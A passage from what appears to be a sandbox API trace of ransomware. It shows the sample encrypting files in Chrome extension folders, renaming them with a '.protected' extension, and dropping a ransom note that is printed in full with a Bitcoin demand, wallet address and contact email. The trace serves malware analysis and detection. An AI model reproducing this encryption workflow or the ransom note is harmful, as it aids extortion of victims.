returned 155 [0080.715] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.715] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.715] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.715] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.715] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\te\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\te\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.715] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\te\\messages.json") returned 155 [0080.715] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.716] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\te\\messages.json") returned 155 [0080.716] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.716] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\te\\messages.json") returned 155 [0080.716] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.716] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, 
nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x115, lpOverlapped=0x0) returned 1 [0080.716] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffeeb, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.717] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x115, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x115, lpOverlapped=0x0) returned 1 [0080.717] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.717] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.717] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.717] CloseHandle (hObject=0x168) returned 1 [0080.717] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\te\\messages.json.protected") returned 165 [0080.717] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\te\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\te\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\te\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\te\\messages.json.protected")) returned 1 [0080.718] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.718] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.718] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\te\\RESTORE_FILES.txt") returned 159 [0080.718] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\te\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\te\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.718] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.718] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.719] lstrlenA (lpString="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") returned 684 [0080.719] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.719] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.719] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, 
lpOverlapped=0x0) returned 1 [0080.719] CloseHandle (hObject=0x164) returned 1 [0080.719] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.719] lstrcmpiW (lpString1="th", lpString2="Windows") returned -1 [0080.719] lstrcmpiW (lpString1="th", lpString2="Program Files") returned 1 [0080.719] lstrcmpiW (lpString1="th", lpString2="Program Files (x86)") returned 1 [0080.719] lstrcmpiW (lpString1="th", lpString2="$Recycle.bin") returned 1 [0080.719] lstrcmpiW (lpString1="th", lpString2="System Volume Information") returned 1 [0080.719] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\th") returned 141 [0080.719] lstrcmpW (lpString1="th", lpString2=".") returned 1 [0080.719] lstrcmpW (lpString1="th", lpString2="..") returned 1 [0080.719] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\th\\*") returned 143 [0080.720] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\th\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.720] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.720] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.720] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.720] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.720] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.720] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | 
out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\th\\.") returned 143 [0080.720] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.720] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.720] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.720] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.720] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.720] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.720] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.720] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\th\\..") returned 144 [0080.720] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.720] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.720] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.720] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.720] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.720] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.720] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.720] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.720] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\th\\messages.json") 
returned 155 [0080.720] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.720] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.720] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.720] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.720] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\th\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\th\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.721] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\th\\messages.json") returned 155 [0080.721] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.721] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\th\\messages.json") returned 155 [0080.721] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.721] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\th\\messages.json") returned 155 [0080.721] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.721] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, 
nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x125, lpOverlapped=0x0) returned 1 [0080.722] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffedb, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.722] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x125, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x125, lpOverlapped=0x0) returned 1 [0080.722] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.722] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.722] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.722] CloseHandle (hObject=0x168) returned 1 [0080.722] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\th\\messages.json.protected") returned 165 [0080.722] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\th\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\th\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\th\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\th\\messages.json.protected")) returned 1 [0080.723] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.723] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.723] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\th\\RESTORE_FILES.txt") returned 159 [0080.723] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\th\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\th\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.723] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.723] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.724] lstrlenA (lpString="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") returned 684 [0080.724] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.724] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.724] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, 
lpOverlapped=0x0) returned 1 [0080.724] CloseHandle (hObject=0x164) returned 1 [0080.724] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.724] lstrcmpiW (lpString1="tr", lpString2="Windows") returned -1 [0080.724] lstrcmpiW (lpString1="tr", lpString2="Program Files") returned 1 [0080.724] lstrcmpiW (lpString1="tr", lpString2="Program Files (x86)") returned 1 [0080.724] lstrcmpiW (lpString1="tr", lpString2="$Recycle.bin") returned 1 [0080.725] lstrcmpiW (lpString1="tr", lpString2="System Volume Information") returned 1 [0080.725] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\tr") returned 141 [0080.725] lstrcmpW (lpString1="tr", lpString2=".") returned 1 [0080.725] lstrcmpW (lpString1="tr", lpString2="..") returned 1 [0080.725] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\tr\\*") returned 143 [0080.725] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\tr\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.728] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.728] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.728] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.728] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.728] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.728] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | 
out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\tr\\.") returned 143 [0080.728] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.728] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.728] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.728] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.728] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.728] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.728] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.728] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\tr\\..") returned 144 [0080.728] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.728] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.728] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.728] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.728] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.728] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.728] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.728] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.728] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\tr\\messages.json") 
returned 155 [0080.728] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.728] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.728] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.728] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.728] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\tr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\tr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.729] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\tr\\messages.json") returned 155 [0080.729] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.729] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\tr\\messages.json") returned 155 [0080.729] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.729] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\tr\\messages.json") returned 155 [0080.729] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.729] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, 
